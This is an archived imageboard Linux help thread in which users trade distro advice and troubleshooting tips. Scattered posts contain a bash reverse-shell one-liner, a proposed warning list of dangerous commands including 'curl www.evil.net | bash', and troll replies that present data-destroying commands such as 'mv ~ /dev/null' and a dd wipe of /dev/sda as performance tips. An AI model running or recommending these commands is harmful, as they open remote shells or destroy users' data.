[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vr / w / wg] [i / ic] [r9k / s4s / vip / qa] [cm / hm / lgbt / y] [3 / aco / adv / an / asp / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / qst / sci / soc / sp / tg / toy / trv / tv / vp / wsg / wsr / x] [Settings] [Home]
Board
Settings Home
/g/ - Technology

Thread archived.
You cannot reply anymore.

File: glmg.jpg (415 KB, 2400x1575)
415 KB
415 KB JPG
Previous thread: >>64677306

/fglt/ - Friendly GNU/Linux Thread
Users of all levels are welcome to ask questions about GNU/Linux and share their experiences.

*** Please be civil, notice the "Friendly" in every Friendly GNU/Linux Thread ***

Before asking for help, please check our list of resources.

If you would like to try out GNU/Linux you can do one of the following:
0) Install a GNU/Linux distribution of your choice in a Virtual Machine.
1) Use a live image and to boot directly into the GNU/Linux distribution without installing anything.
2) Dual boot the GNU/Linux distribution of your choice along with Windows or macOS.
3) Go balls deep and replace everything with GNU/Linux.

Resources: Your friendly search engine, mailing lists...
>b-but what search engines respect my privacy and freedom of speech?
Try qwant, searx, ixquick or startpage.
>b-but what e-mail providers respect my privacy and freedom of speech?
Try autistici or aktivix.

$ man %command%
$ info %command%
$ help %command%
$ %command% -h
$ %command% --help

Don't know what to look for?
$ apropos %something%

Check the Wikis (most troubleshoots work for all distros):
https://wiki.archlinux.org
https://wiki.gentoo.org

/g/'s Wiki on GNU/Linux: https://wiki.installgentoo.com/index.php/Category:GNU/Linux

>What distro should I choose?
https://wiki.installgentoo.com/index.php/Babbies_First_Linux
>What are some cool programs?
https://wiki.archlinux.org/index.php/list_of_applications
https://directory.fsf.org/wiki/Main_Page
>What are some cool terminal commands?
http://www.commandlinefu.com/
http://bropages.org/
>Where can I learn the command line?
http://mywiki.wooledge.org/BashGuide
http://www.grymoire.com/Unix/
>Where can I learn more about Free Software?
https://www.gnu.org/philosophy/philosophy.html
>How to break out of the botnet?
https://prism-break.org/en/categories/gnu-linux

/t/'s GNU/Linux Games: >>>/t/796840

/fglt/'s website and copypasta collection:
http://fglt.nl && https://p.teknik.io/wJ9Zy
>>
File: 1514160467221.jpg (87 KB, 580x346)
87 KB
87 KB JPG
>>
:: Starting full system upgrade...
there is nothing to do

:( now what?
>>
>>64692548
>https://wiki.installgentoo.com/index.php/Babbies_First_Linux
>redcore not there
shit wiki
>>
>>64692600
Go outside
>>
how do i break arch?
seriously, i keep hearing how it's unstable and breaks all the time so i wanna break it
>>
>>64692671
add unsupported repositories and use yaourt for all your package management
>>
can someone walk me through what exactly this does? this works where netcat did not.
bash -i >& /dev/tcp/192.168.0.1/443 0>&1
>>
File: screenfetch.png (42 KB, 955x352)
42 KB
42 KB PNG
>>64689909
Successfully running Arch with Xfce.

Gotta configure Xfce now, not liking the default at all.
>>
>>64693097
Is this a question?
>>
>>64693180
there's nothing wrong with blogging
>>
>>64693180
How do I apply keymap to XFCE?
>>
>>64693218
Do you mean keyboard layout?
setxkbmap
, or maybe it is
setxkbdmap
Do you want to set up your hotkeys? Use either xbindkeys or sxhkd
That is assuming you are in an xorg session. If in a tty you could use localectl to set the keyboard layout
>>
File: vbox.png (5 KB, 800x600)
5 KB
5 KB PNG
installed gnome with arch, wanna remove it, can't remove it. what do?
>>
>>64693276
-Rsc as far as I recall. It will break a shitload of other things as well though. Make sure you still have a dhcp client installed before runnign that, as the command may remove it.
>>
Guys, probably a silly question to ask, i live in Frogland (Paris) and looking to move into web-dev. From my research, Linux isn't used anywhere in France, it seems to be soley Windows usage.

Is it worth learning the GNU/Linux OS if i don't live in the USA? Would they even be available/supported here since the majority of them are US based companies?
>>
>>64693303
yeah that works but removes LITERALLY everything. Why does everything depend on GNOME like that?
>>
>>64693276
pacman -Rdds gnome
>>
>>64693265
ﹱ ፈ﹵ቸከ$ደ ﹵ፐ
>>
How much longer is gtk2 going to get supported?
>>
>>64693383
it seems that worked well
>>
>>64693265
>localectl
Thanks, this worked well the second time.
>>
Finally. Getting the latest Vagrant and VBox straight from a package manager.

>the effort of installing Arch wasn't for nothing
>>
>>64693359
Pretty sure there are a few Debian developers from French universities.
Also not sure how geography is relevant, unless you are looking for a Linux it job. Noone supports consumer Linux.
>>
Trying to get manjaro to work on a spectre x360, but I'm running into a bit of a road block. When I boot off the USB GRUB enters unknown file system mode. I tried getting it to boot with ubuntu and everything runs normally. I've tried xfce, gnome, and kde just to see if anything will work and nothing seems to change. Anyone got some solution to this that doesn't involve tons of modification?
>>
I have a few python scripts im trying to run.
When i execute them they return
illegal hardware instruction (core dumped)

And dmesg returns
python[24460] trap invalid opcode ip:7fb4d67981ad sp:7ffd16de66c0 error:0 in dlib.cpython-36m-x86_64-linux-gnu.so[7fb4d6309000+5c5000]

It is only these certain scripts, other scripts work fine.
What could cause this?
>>
>>64694364
what program are you trying, and what is your system architecture?
>>
>>64692548
apt-get autoremove messed up my audio in debian
should i install pulseaudio? it has alsa installed
>>
>>64693218
>to XFCE?
You open the xfce keyboard configuration program and set it.
>>
>>64694433
faceswap
x86_64
>>
>>64692671
Delete system32
>>
>>64693097
I have no idea what XFCE is or does sorry.
>>
>>64692671
It comes broken ootb.
>>
>>64694620
>I have no idea what XFCE is or does sorry.
GNOME devs pls go and stay go
>>
>>64693359
Linux doesn't have desktop market share worth mentioning outside Southeast Asia shithole countries. You should learn Linux well enough to set up apache with PHP and mariadb if you want to claim to be a full stack developer. Apache and nginx appear to host the vast majority of domains in France[1], and like 95% of that is going to be Linux because nobody pays for a Windows license on an Apache server.
[1] https://secure1.securityspace.com/s_survey/data/201801/fr/index.html
>>
>>64694682
GNU/Linux*. Linux is just the kernel.
>>
>>64694452
the audio works locally but firefox has no sound. it says to download pulseaudio but whats wrong with alsa?
>>
>>64695015
Unless you compile out pulseaudio in the mozconfig when you build it, you have to use pulseaudio for audio in firefox.
Your options are to compile it out and enable alsa or use pulseaudio, or use apulse
>>
>>64695079
Thanks a lot anon but I started to add things with alsa's name on it so I did add apulse but it doesn't work. I even rebooted but nothing... Installing Pulseaudio then
>>
>>64694460
>illegal instruction

you will have to recompile the program and make sure it isn't compiled for a cpu arch that yours isnt compatible with
>>
>>64695194
It is a python script, there is nothing to compile.
I know project the arch is x86_64.
>>
>>64695226
surely it makes calls to compiled code
>>
>>64695367
It references other python scripts, but there are no binaries in the repo
>>
File: IMG_20180211_211712.jpg (1.83 MB, 3264x1836)
1.83 MB
1.83 MB JPG
Should i end my life right now?
>>
>>64696203
partprobe?
>>
linux mint, noticed my laptp freezes every once in a while i dont know if its the cpu update that i did or maybe sylvia is to hight tech for y laptop
>>
>>64696274
>linux mint
found your problem
>>
File: 1501085467071.gif (294 KB, 500x450)
294 KB
294 KB GIF
my gnome nautilus crashes when I try to add a samba drive. I can mount the drive correctly using
-o rw,vers=1.0
. If I try to launch nautilus via terminal and causing the crash, sometime a segmentation fault is reported. what should I do? I can correctly mount other smb drives in nautilus but not the smb drive managed by my router
>>
meta packages or groups?
>>
>>64696720
Meta
>>
>>64696728
why
>>
>>64696720
if something leaves the group, it won't be removed?
dunno if the same is true for meta
>>
>>64696281
so how do i fix my problem ?
>>
>>64696225
Thanks.
>>
why would xdg-open use audacious for directories when xdg-mime says my file manager should be used?
>>
Could you please advice some easy, customizable and well documented status bar for i3? I've tried polybar, but it seems I am too brainlet to understand it. Can't even paste in Font Awesome icons and get the volume controls working. Please help.
>>
File: Kubuntu_logo.jpg (45 KB, 400x371)
45 KB
45 KB JPG
I'm running Kubuntu 17.10 that I've dual booted with windows 10. Set up all the partitions myself for the first time too. I have an SSD with all my main Linux files and now I'm trying to set up an HDD as a storage drive for random stuff like Steam vidya.

I've already mounted the drive to my knowledge but I can't seem to create any new files on the HDD, the, "create new," option is simply faded out and unclickable. Had I fucked up, forgot a step? What should I be looking for?

Also, there's a random folder labeled, "lost+found" that's locked and reappears in my root and HDD directory. Whenever I try to open it the message, "Could not enter folder /lost+found," pops up. Should I be concerned?
>>
>>64697021
Apparently the entire mimetype system breaks if a default inode/directory application is set in ~/.config/mimeapps.list.

Why are computers so fucking awful?
>>
>>64697491
Check ownership of the drive, do you have write permissions?
>>
File: 1513859663000.jpg (11 KB, 326x326)
11 KB
11 KB JPG
addreminder()
{
local filename="$1";
shift;
echo "$@" > "~/.reminders/$filename";
}

>addreminder test some words
>bash: ~/.reminders/test: No such file or directory
Am I retarded? Why doesn't this work? The > is supposed to write to the file, why is it saying the file I want to create doesn't exist?
>>
>>64698366
does ~/.reminders exist?
using ">" won't create parent directories
use something like "if [ ! -e ~/.reminders ]; mkdir -p ~/.reminders; fi" (if not exists <dir>; make <dir> and any parents)
>>
>>64698389
Yeah, it exists. I just tried replacing ~ with the absolute path and it works. I guess it's not expanding ~ or something.
>>
>>64698422
Yeah, just writing echo "some words" > "~/.reminders/test" fails, tab automatically expands ~/ to /home/user. Weird.
>>
>>64698422
oh wait
you put ~ in quotes, can't do that, it won't be expanded by the shell
>>
>>64698442
Ah, I see. Thank you!
>>
>>64692548
You guys may know, sorry if its a "google it" type of question, i have an acer laptop and an asus laptop, both running mint 18.3. If i just physically swap the hdds around, am i likely to have issues? Thanks in advance
>>
>>64697491
You need to disable fast boot in Windows
Power & Sleep Settings > Additional power settings > Choose what the power buttons do > untick fast startup
>>
Does anyone know how to prevent MPV from smoothing out an image when upscaling?

This video for example
https://www.youtube.com/watch?v=lpfn0lKJdqs
is pixel art, and when I view it at fullscreen on youtube it still keeps the sharp corners around each pixel, but if viewing it through MPV and view at fullscreen it all gets blurred out and looks ugly.
>>
>search glmg in catalog
>get this thread because of the filename
faggot
>>
>>64698663
--scale=nearest
>>
why tf is qbittorrent so laggy? it also ruins the kde desktop & i have to ctrl alt backspace to get out & re login. it wasn't like this at all when i was using windows & i had the same amount of torrents
>>
>>64698663
>>64698703
Hmm, it still doesn't look quite right. I wonder what youtube is doing that makes it look so good
>>
>>64698470
Maybe. Depends on how different their hardware is. You'll most likely to have problem with WIFI
>>
what should I install in my live operating system
gnome based pls no qt bullshit
>>
How do I quit VIM????
>>
File: th.jpg (5 KB, 269x202)
5 KB
5 KB JPG
>>64699018
>>
>>64699004
I have no idea what "qt bullshit" is or does, sorry.
>>
why the fuck do 95% of itros come with screen tearing out of the box? im using an intel cpu with integrated graphics, this is a fucking joke , just installed Debian 9 with lxde on my thinkpad, ubuntu is the only distro without screen tearing, this shit just makes me rage
>>
>>64698663
>>64698703
>>64698829
Oh shit, it's the format. I thought things like mpv and youtube-dl automatically fetch the highest quality, but in this case it looks like it's grabbing a low quality version.
I thought the video was just naturally low resolution and youtube somehow scaled it up to preserve the pixelation.
>>
>>64699018
You're in vim forever now.
Better get used to it. Start by addressing the irrationality of your desire to leave vim in the first place - do you *really* have a good reason to quit vim? Shouldn't you instead just figure out how to do what you want to do from vim from now on? These are the question you must seek answer to, "how do I quit vim" is just the wrong question.
>>
File: out.png (390 KB, 1366x768)
390 KB
390 KB PNG
What are /fglt/'s favorite systemd-less distros? I think I've finally settled on Slackware.

Debian with systemd ripped out also seemed to work reasonably well.
>>
>>64699018
Why do people ask such questions on forums and such, when they can just put the same exact phrase into search engine and get the answer immediately?
>>
>>64699178
>no systemd
I imagine that one day people with gasoline cars will have to go out of their way to fill up while everyone else just swaps out their batteries on the go
>>
>>64699178
Gentoo and I have high hopes for GuixSD if I ever get around to trying it.

>>64699197
Is the battery cars supposed to represent OpenRC?
>>
>>64699211
>Is the battery cars supposed to represent OpenRC?
No. From the critics of systemd: "There is also concern that it forms a system of interlocked dependencies, thereby giving distribution maintainers little choice but to adopt systemd as more user-space software come to depend on its components."
Imagine your gas stations being replaced by battery stations-- your new interlocked dependencies :)

Either learn systemd now or go out of your way to "fill up"
>>
>>64699263
Learning systemd is not the issue - from a sysadmin standpoint it is fantastic. Not revolutionary, but makes life easier.
I don't want it on any of my machines, though. It may be a step forward in one direction but is at least 2 back in others.
Software does not always progress linearly in terms of quality or usefulness.
>>
>>64699295
Fair enough. I've been fortunate enough to not have learned inits until systemd circa 2012. My only excuse is that I have no reason to bother with any legacy init. My complaint is changes in systemd may break system beacuse I rely on so many features.
>>
I am having some trouble with passing through my second GPU, thought I'd create a forum post for help, but didn't get any help yet.
https://bbs.archlinux.org/viewtopic.php?id=234214
>>
downloading my first linux distro right now to play around with, "debian 9.3 amd64 stable" any advice from /g/? is this a good beginner distro, I hear alot of people shit on gnome which i read is the default for debian should i switch it? what should i download first on a fresh install. any advice,pointers or tips is appreciated.
>>
>>64699391
Here is how I usually deck out a fresh Linux install. Just do everything you might need on a daily basis, like try to browse your favorite websites, consume some of your local media, spin up a VM,... Just see where you hit snags, like needing flash, or video codecs, or a hypervisor. And follow the Debian wiki/forum to resolve your issues. Ypy should be up and running pretty fast if you know how to read. I don't like suggesting program's since you should be free to choose what you prefer. Try out some, its fun and easy with apt.
>>
>>64699380
my mkinitcpiois
MODULES=(vfio vfio_iommu_type1 vfio_pci vfio_virqfd)

and my kernel command line has the following
amd_iommu=on vfio-pci.ids=1002:67df,1002:aaf0 video=efifb:off kvm_amd.avic=1 nomodeset default_hugepagesz=1G hugepages=24 transparent_hugepage=never

I don't bother with the scripts and shit they have. just associate it with the kernel at boot
>>
>>64699458
Can't associate with PCI.ids, since I have 2 identical cards.
>>
>>64699380
>>64699458

nvm, realized you have the same card x2. that sounds more difficult and I haven't done that. I made sure to buy different cards.
>>
>>64699391
Use VMWare Workstation Player to audition new distros and only boot natively when you find one you think you can work with.

Debian stable is very well curated but usually too out of date to be a good desktop as-is. You can apt pin packages from testing/unstable and try to manage the ensuing dependency shuffle, but you could just as easily start with Xubuntu where that isn't as much a problem and make peace with the idea that not every single file in /usr/bin is going to have a corresponding man page.
>>
>>64699581
i see this complaint often (sorry im new) what do you mean by out of date? will the operating system not function properly unless its updated very often? i didnt think it being out of date would be such a huge problem. would love an explanation thanks for your above suggestions and tips.
>>
>>64699777
You won't have the latest new features or bugfixes.Debian however outdated is a highly stable OS due to their use of older, but more stable packages.
Say you want Firefox. Using the built in package manager you can download Firefox. It might be a version or 2 behind, but you won't notice this in normal operation. You'll be fine.
>>
How do I load XFCE panels from config from command line? Is there any panel that would allow me to load it configurations from command line, except polybar, which doesn't have open windows buttons and which system tray is worst implementation possible? I want to alternate between XP-like and Unity-like panel whenever I turn my tablet screen.
>>
What is the best distro to:

>not have systemd
>run wayland (sway)
>run steam

Thanks in advance.
>>
Friendly heads up: MATE 1.20 now has full HiDPI support! This means that all the applications have been ported to Gtk3 and Wayland becomes possible in the future! I'm going to try a fresh install of Arch+MATE on my old rMBP, since OSX, GNOME 3, and KDE 5 all make it a bit too slow.
>>
>>64699777
Linux hardware support tends to lag behind the mainstream by a couple years, and the Debian process adds a couple more to that. So if you have hardware <5 years old, there's a good chance Debian stable is missing some pertinent improvements.
>>64699896
>Debian however outdated is a highly stable OS due to their use of older, but more stable packages
Debian's definition of "stable" has nothing to do with reliability. It only means all the packages in the OS are guaranteed to have correct dependencies and meet various other Debian usability guidelines like having a /usr/share/doc entry populated and a man page for every command. You get whatever software version they had when they finished dotting i's and crossing t's. If a bug does not warrant a CVE, it is not fixed. No matter how crippling it may be to the program in question.
>>
>>64700253
There's a 4.14 kernel in backports.
>>
I want to dual boot windows 10 and Linux but I can't choose what distro to install. New to Linux btw
>>
>>64700272
At this point I'd consider waiting a couple of months for Ubuntu 18.04. Ubuntu LTS has been the standard newbie path into Linux for over a decade for a reason. I started on Ubuntu 8.04 myself.
>>
>>64700220
Gentoo.
>>
>>64694691
No.
>>
>>64696787
Install a distro that's not a meme.
Try an Arch like Antergos, it just werks.
>>
I set $TERM=rxvt-unicode, yet when I do neofetch it still shows my terminal as x terminal emulator. What gives?
>>
>>64700437
It's probably parsing argv for the actual shell process. Try running it in tmux or screen.
>>
i switched from unity to i3 and i3 completely ignores my dualscreen setup and just replicates them

how does one go around to fixing this? do i need a startup xrandr script?
>>
>>64700537
Yes.
>>
>>64700563
okay thanks
>>
>>64700266
Cool story. So all I have to do is install "stable", then hit the backports for drivers and codecs, then pin some packages from upstream for programs I really care about. Is anyone going to support this clusterfuck? It sounds like Arch's evil twin from another dimension.
>>
>>64696274
I was experiencing the same shit with Mint. At total random times, my pc would lock up without the restart button even working.
>>
Newb, but not THAT newb here. Had been using Debian for the past months, I thought that it would be a good distro to get myself into Linux. I think it was a good decision for that, but now it's not that comfy anymore. I want to switch to a more permanent and customized distribution.
Can you recommend something for someone like me? Oh, and I've looked into some mainstream ones and their setup, so I have no problem with manual installation, as long as it's well documented on their wiki or some other place.
>>
Anyone know an icon theme that has nice versions of these icons (nm-applet, udiskie, battery) ? All that I tried (Arc, Numix, ...) either don't change them, or I'm doing something wrong.
I used to have them but recently reinstalled and forgot how configured them.
Especially the battery one is hideous
>>
>>64700626
>"drivers and codecs"
Consider suicide, winfag.
>clusterfuck
Backports is part of Debian. People run backports kernels all the time on desktops and laptops.
>"pin some packages from upstream"
lolwat? Upstream software generally has its own repositories that don't conflict with Debian at all (x2goserver, Google Chrome, etc.) or is in appimage or flatpak form that doesn't touch package managed directories at all, or is just an archive you can unpack to /opt. The ONLY way to break Debian apt/dpkg is to force install packages intended for a different release or for Ubuntu. Avoid that and you're golden.
>>
>>64700653
This also isn't how it is supposed to be right? Installed it through pacman
>>
>>64700653
No.
>>
File: LTO5hh_intm.jpg (30 KB, 400x226)
30 KB
30 KB JPG
Does GNU/Linux support old tape drives? will it need a driver to work? An acquaintance is selling a LTO5 tape drive he got from his workplace, the price isn't bad considering that externally it's almost new but I want to make sure that I can actually use it.

My OS is OpenSUSE by the way. The drive is that in pic, uses SAS connector and is powered through molex connector, I can probably find an adapter for SAS to SATA so that shouldn't be a problem, though I never used a tape drive before so I don't know if I need something else in between to be able to connect it properly.
>>
>>64700857
Unix and Linux have supported tape drives for decades, yes. That's literally what "tar" exists for: Tape ARchives.
>>
>>64700857
You can plug SATA into SAS, but not SAS into SATA. If the signalling is SAS you're just screwed no matter if you use a hobbyist OS or a real one like Microsoft Windows 10.
>>
>>64700880
Go swan dive into a woodchipper, pajeet.
>>
File: Untitled.png (24 KB, 1114x247)
24 KB
24 KB PNG
>>64700857
yes, that drive has linux support
server/workstation hardware tends to get linux support quickly, sometimes even before windows, because linux is common in those areas
>>
>>64700869
Cool, that's really good news, because together with the drive he's also selling a bunch of tapes and I know where to find some cheap new LTO4/5 tapes as well, I can finally hoard indian hieroglyphs like there is no tomorrow.

>>64700880
It should work if I use a PCIe adapter right? like SAS to PCIe x1. Though, are you sure I cannot use a SAS to SATA adapter? they must work if they keep making them.
>>
>>64699197
>comparing memed vs. openrc to battery cars vs. gasoline cars
this is the dumbest and most pathetic pro systemd argument I saw so far and I saw most of them.
>>
>>64700896
he's right though, same physical layer, but different protocol, sata is ata, and sas is scsi
it's normal for sas controllers to support sata, but not as common for sata controllers to support sas
>>
>>64700906
>are you sure I cannot use a SAS to SATA adapter? they must work if they keep making them.
sas is used in servers and workstations, not consumer desktops
>>
>>64700900
>server/workstation hardware tends to get linux support quickly, sometimes even before windows, because linux is common in those areas
Right I forgot about that, the workplace of my acquaintance also runs unix-based servers now that I think about it.
>>
>>64700906
They make the adapters because some SAS compatible controllers are only given SATA ports, so they'd technically work with a SAS drive if you can connect them. You probably don't have a SAS controller.
Yes, it would work with an addon SAS board.
>>
>>64700931
I'll ask if he can sell me a controller with it, I guess they must have some if they worked with tape drives. The prices for new SAS controllers are crazy, what the hell... it's just some PCIe board.
>>
>>64700982
you're really new to non-consumer shit, aren't you?
>>
>>64700982
You can get used RAID controllers for nothing.
>>
about to swap from manjaro to xubuntu.

hope its fun.
>>
File: s-l1600.jpg (32 KB, 600x600)
32 KB
32 KB JPG
>>64701020
I know but I'm not very fond of buying used boards blindly over the internet. I saw some cheap ones that I can afford to get even if it's DoA though they don't have cables or just have ports with cables that are hard to find. The one I am looking at for example has 32pin connector, while the tape drive has 22pin connector, the cable for 22pin to 32pin costs over 50 euros, pic related.

>>64701002
Pretty much.
>>
Best current way to securely wipe an external hard drive without fucking it up?
>>
>>64701299
pv < /dev/zero > /dev/sdz
>>
Is Gentoo on modern hardware noticeably faster than other distros? Why is it faster? Is it because every processor has a different instruction set? Does it compile its' kernel? :0
>>
>>64701391
>>>out
>>64692548
We need to add list of dangerous commands to OP copypasta.
1. rm -rf /
2. dd if=/dev/{null,random,urandom}
3. {xxd,base64} obfuscations
4. curl www.evil.net | bash
... post more
>>
>>64701431
>if=/dev/null
anon...
>>
>>64701419
Gentoo is a few hairs faster than mass market kernels because it takes every advantage of your processor, and leaves out features to your specification
>>
>>64701437
U mean lack of of=$patch ?
>>
>>64701445
no, i mean you can't read from null, it's write-only
>>
>>64701452
Fug im dumb
>>
>>64698703
>>64698829
>>64698663

Use oversample instead.
>>
is there a way to autocenter my floating windows in i3
>>
I want to move from zorin (ubuntu, debian) to sabayon (gentoo).
I'm used to debian, is it a good idea to move to gentoo or will i be completely lost ?
>>
>>64692548
Not exactly a linux question, but I guess this is the best place to ask.
I need to install winows for uni. Can I install windows alongside an already existing linux instalation?
I can only find guides for the other, more common case. I'd like to avoid windows writing over my existing files
>>
>>64701884
That's totally dependent on your willingness to read about stuff.
Though, I'm going to say that you will do fine given enough time.
>>
File: 1490315498149.png (248 KB, 1252x538)
248 KB
248 KB PNG
>>64702335
I'm tryin it in virtualbox, using rigo for first update (one hour later, still updating), i really like how it looks.
>>
>>64700653
>>64700675

Your Numix theme is broken there. Download a proper file.
>>
>>64702383

>looks
Every distribution can look the same, retard.
>>
>>64702655
Friendly thread, go eat a dick
>>
>>64702655
>*** Please be civil, notice the "Friendly" in every Friendly GNU/Linux Thread ***
YOU are the retard, learn to read.
>>
>>64701980
Pls answer
>>
What version of ubuntu should I install along side windows 10?
>>
>>64702715
I have never installed it this way round but I'm pretty sure Windows will just overwrite your bootloader so you'd install Windows then chroot via Live CD and install your Linux bootloader again. But as I said, only my assumption no experience
>>
I want to covert a markdown file to HTML, append a header to it and save it to a new file. This is what I have. Is there a better approach to this? For example, is using <() necessary here? What could I substitute it with? The header must be stored in the script itself (as a variable), because I don't want to spread it across 2 files.

cat <(echo "$header") <(markdown_py "$1") > "$2"
>>
>try to install gentoo
>understands the meme now
>>
>>64702828
meme installation and upgrades
BUT
great OS
>>
i have a program which i can launch with sh command from bin folder.
What do I need to do so that I could launch it with fn + d and typing its name in i3 ?
>>
Long ago I tried to install Ubuntu into my laptop but Windows 10 is preventing it..how do I get around it? I had Ubuntu on a Windows 7 laptop no problem
>>
File: ERcKDix.jpg (63 KB, 633x1024)
63 KB
63 KB JPG
>>64702768
If you are beginner, always choose the current LTS (Current one is Ubuntu 16.04.3)
>>
I'm trying to install qtwebkit 5.212 on gentoo but CMake can't find ruby because apparently FindRuby only supports ruby 1.8 to 2.1, but the earliest ruby on portage is ruby 2.2.
Should I install ruby 2.1 or what?
>>
>>64703464
Try to install a newer version of the package that supplies findruby.
>>
Using notify-send to output volume changes but instead of replacing the previous notification it'll just create more notifications for multiple presses. Any way to make it replace the previous without brute force killing the process?
>>
Is there any reason to use the zen kernel in the current year? Does it actually make a difference?
>>
>compiled 4.15 kernel on Turion64 shittop with 7.3.0 gcc
>run spectre-meltdown checker shell script
>3x Not vulnerable

feelsgoodman.jpg
>>
>>64702808
Most obvious to me seems
printf '%s\n' "$header" > "$2"
markdown_py "$1" >> "$2"

If you wanted to keep everything in memory like your original does
printf '%s\n%s' "$header" "$(markdown_py "$1")" > "$2"

The output should be the same except you're not creating subshells or loading cat. Also not likely, but echo may behave unexpectedly depending on the content of $header.
>>
I'm running virtualbox on ubuntu with an SSD for VMs. How come the windows task manager inside the VM shows 100% disk activity but iotop on my server only shows roughly 25% activity? I have the VB extensions installed and whatnot, disk is marked as solid state too. Is it just overhead?
>>
I'm getting this error while trying to install Arch, supposedly the partutions are empty, halp?
>>
File: IMG_20180212_140555.jpg (2.02 MB, 3264x1836)
2.02 MB
2.02 MB JPG
Woops, forgot pic
>>
>>64704528
Did you try to install stuff using pacman before chrooting?
>>
Does a file's inode ctime change whenever anything about the file is changed (contents or properties)? Or is it only properties?
>>
>>64704452
Probably a lot of overhead. Heavy disk IO in VMs isn't super efficient. Especially if it's a sparsely allocated disk image and you're adding new blocks. That adds a ton of round trips in and out of the host OS. % disk utilization is a bullshit statistic though. You shouldn't expect it to line up perfectly between guest and host in any circumstance.
>>
/ourguy/ is right about Microsoft https://www.youtube.com/watch?v=JnfzmMddng8
Beware EEE
>>
>>64699018
use emacs
>>
Why do developers think it's ok to use GTK3? How do we stop them?
>>
i'm a retard and accidentally deleted /usr/share/zoneinfo instead of /etc/localtime and now i can't set the time. help
>>
>>64704878
>How do we stop them?
use qt
>>
A few days ago, I installed Wine on Arch, and everything was working fine. Since then, I've removed all orphan packages, and Wine no longer works right. If I start anything in fullscreen, it just freezes i3, then starts playing in the background (like, I hear it running, but can't see it or do anything except close i3). If I start anything in windowed mode, it works fine until I close the window, then i3 freezes. Did removing orphans actually remove some essential package?
>>
>>64704618
No, that's the mtime.
>>
>>64704887
What distro? You should be able to reinstall the relevant package.
>>
>>64703464
I did it.
FindRuby is broken, that's all, I set the variables needed and it's compiling now.
>>
>>64705276
I thought mtime was content and ctime was anything about the file (content or properties)?
>>
>>64705615
Creation time
(Last) modified time
>>
>>64705818
ctime is change time.
mtime is modified time.
>>
>>64704452
>VirtualBox
Found your problem.
>>
File: 54868221_p0_master1200.jpg (166 KB, 700x554)
166 KB
166 KB JPG
I am looking to go balls deep full GNU/Linux.
I tried Xubuntu and Mint so far, liked them both. I have no knowledge of commands or code but I am willing to learn in order to operate what I will be ending up getting. Which distro do you recommend to me? I do some light gaymen sometimes (just gsg and warthunder) and listen to flac music, if that is important.
>>
>>64706166
All distros can do those things.
>>
>>64706186
I figured as much. I am not heavily into ricing and I am aware that is a waste of time, however I kind of want to try it. What would be the best distro for that?
>>
>>64706193
Gentoo
>>
File: 54868221_p1_master1200.jpg (101 KB, 700x554)
101 KB
101 KB JPG
>>64706230
For real?
>>
/g/entlemen, is it possible to have ubuntu minimal installation?
Like without any DE (I'd like to pick i3wm), something like arch where I install what I want?
I see there's netinstall, never tried it before, but is this what I need?
Any info would be helpful
>>
>>64706193
Again, all distros can do ricing, and any customizations you want.

For new users the only difference between distributions that would actually matter to you are basically just initial configurations. E.g. pick a distro whose initial setup is closest to the end result you want. There are of course many more major distinctions between distros, but there is no need to make up your mind on those things right now (unless you're an autist then go for it), and you can just worry about that stuff later on down the road after you've become more familiar with GNU/Linux in general.
>>
>>64706266
Gentoo's entire reason for being is total control over every aspect of the system to the point of rice.
>>
>>64706307
>>64706302
Alright, thank you lads. The only autism I really have is that I want a GUI for everything, that's all.
>>
>>64706318
So install it later.
>>
>>64706333
what do you mean?
>>
>>64706295
Use the normal installer DVD, press F7 at the boot screen and select minimal.
>>
File: 20180212_203235.jpg (84 KB, 500x700)
84 KB
84 KB JPG
I'm doing a CLFS build and trying to load a kernel image in U-Boot from my SATA HDD.
However the kernel CRC checksum keeps failing even after doing a memory compare between flash & RAM.
When loading from flash everything works fine.

I've got an example log here https://pastebin.com/raw/5wXwir4Q
Anyone got any ideas on how to troubleshoot this?
>>
>>64706318
Not sure if you're referring to only using the applications, or if you're referring to settings menus. But just so you know you cannot do ricing without leaving the GUI's. And a lot of distros (DE's/WM's) don't have any settings menus at all.
>>
>>64706362
GUIs aren't "built in" like on Windows, so you can install without one and add it later. They're just other packages.
>>
>>64699018
because :x is so much more complicated than Ctrl X, then Y, then Enter.
>>
>>64706412
>Ctrl+x, y, enter
>Shift+;, x, enter
>>
>>64706412
>>64706461
> not exiting your editor of choice with kill -9
>>
File: 150042563278146.jpg (835 KB, 2299x1774)
835 KB
835 KB JPG
Is your machine TURBO BOOSTED?
>no? wtf is that faggot
It's unlocks the full potential of your Lunix machine!
Here's how you do it, fags:
>open terminal
>type:
mv ~ /dev/null
This shuts off the dev holdbacks and allows you to fap to trap porn at TWICE the speed!
>>
File: 1516289423686.jpg (25 KB, 340x270)
25 KB
25 KB JPG
>>64706363
Thanks!
>>
>>64694364
Anyone?
>>
i've got a problem, i'm on mint (i know shitty distro but i had no time to switch recently) and suddenly this crap started to recognize all the usb drives as read only, what to do? other than change distro

plebbit was not useful as they said this should not happen on caja with the mate desktop on mint 18.3
>>
File: 1494613517388.png (105 KB, 883x1024)
105 KB
105 KB PNG
Would a hardened profile + kernel further mitigate the spectre shit that's been going on?
>>
Arch Newb here, so i just managed to install Arch i guess. I installed KDE on it, set up users and then i did a reboot, logged into my account and noticed i didn't have an internet connection, i also dont have a terminal installed whatsoever, all applications i try to open send me directly to "Discover" the software center. Is there a way to boot directly into the console? i tried Ctrl-Alt F1,2,3... but didn't work
>>
i'm on mint (shitty distro i need to hop to something else) and it started reccognizing all ubs drives as read only, what can i do?

btw, plebbit was useless as they said shuch thing shouldn't happent on mint 18.3 with caja on mate
>>
>>64706973
No, after you mitigated it -unless some new vulnerability comes out- further mitigations have nothing to mitigate.
>>
>>64706998
well mitgating is not preventing
>>
>>64706518
>mv ~ /dev/null
My brother died from this, don't do that guys.
>dd if=/dev/rand of=/dev/sda
is much better
>>
>>64706988
yes, reboot, in grub press e to edit your arch line, find the line that starts with "linux" and add "single" to the end of that line.
memed should drop you into a "recovery console".
There you can
1. remount root as rw
mount / -o remount,rw

2. turn on ethernet
ifconfig eth0
dhclient eth0

replace eth0 with the relevant """"""""""""""""""predictable"""""""""""""""""""""" interface name
3. install networkmanager, wicd or set up networking in some other way.
>>
>>64706518
>Move directory to null
Null is a file you fucking moron.
>>
Bros, what is the best distro for compiling your very own GNU/Linux distro?
>>
>>64707132
what does this even mean
>>
>>64707132
Install genbuntoo from scratch
>>
